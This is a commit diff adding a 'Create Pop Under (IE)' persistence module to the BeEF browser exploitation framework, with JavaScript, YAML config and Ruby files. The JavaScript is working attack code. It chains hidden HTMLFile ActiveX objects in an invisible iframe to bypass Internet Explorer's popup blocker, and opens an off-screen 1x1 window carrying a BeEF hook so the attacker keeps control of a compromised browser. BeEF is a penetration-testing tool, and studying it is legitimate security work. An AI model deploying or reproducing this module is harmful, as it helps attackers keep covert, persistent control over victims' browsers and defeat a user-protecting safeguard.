Add popunder persistence module with popup blocker bypass for IE

modules/persistence/popunder_window_ie/command.js

@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html';
+  var popunder_name = Math.random().toString(36).substring(2,10);
+  var iframe_name = Math.random().toString(36).substring(2,10);
+
+  // Create iframe
+  var popunder_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  popunder_<%= @command_id %>.name = iframe_name;
+  popunder_<%= @command_id %>.id = iframe_name;
+
+  // Create an HtmlFile from an IFrame
+  var ax1 = new window[iframe_name].ActiveXObject("HtmlFile");
+
+  // Destroy the contents of the IFrame, while keeping ax1 alive
+  // because we have a reference to it outside the IFrame itself.
+  window[iframe_name].document.open().close();
+
+  // Initialize the HtmlFile
+  ax1.open().close();
+
+  // Create a new htmlFile inside the previous one
+  var ax2 = new ax1.Script.ActiveXObject("HtmlFile");
+  ax2.open().close();
+
+  // Launch popup
+  beef.debug("[PopUnder Window (IE)] Creating window '" + popunder_name + "' for '" + popunder_url + "'");
+  ax2.Script.open(popunder_url, popunder_name, 'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left=' + screen.width + ',top=' + screen.height).blur();
+  window.focus();
+  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window requested');
+});

modules/persistence/popunder_window_ie/config.yaml

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        popunder_window_ie:
+            enable: true
+            category: "Persistence"
+            name: "Create Pop Under (IE)"
+            description: "This module uses a <i>HTMLFile</i> ActiveX object to bypass the popup blocker and create a popunder window containing a BeEF hook. Internet Explorer only.<br/><br/> Based on <a href='https://www.cracking.com.ar/demos/iepopups/'>PoC</a> by <a href='https://twitter.com/magicmac2000'>@MagicMac2000</a>."
+            authors: ["bcoles", "ethicalhack3r", "@MagicMac2000"]
+            target:
+                user_notify:
+                    IE:
+                        min_ver: 11
+                        max_ver: latest
+                not_working: ["All"]
+

modules/persistence/popunder_window_ie/module.rb

@@ -0,0 +1,10 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Popunder_window_ie < BeEF::Core::Command
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end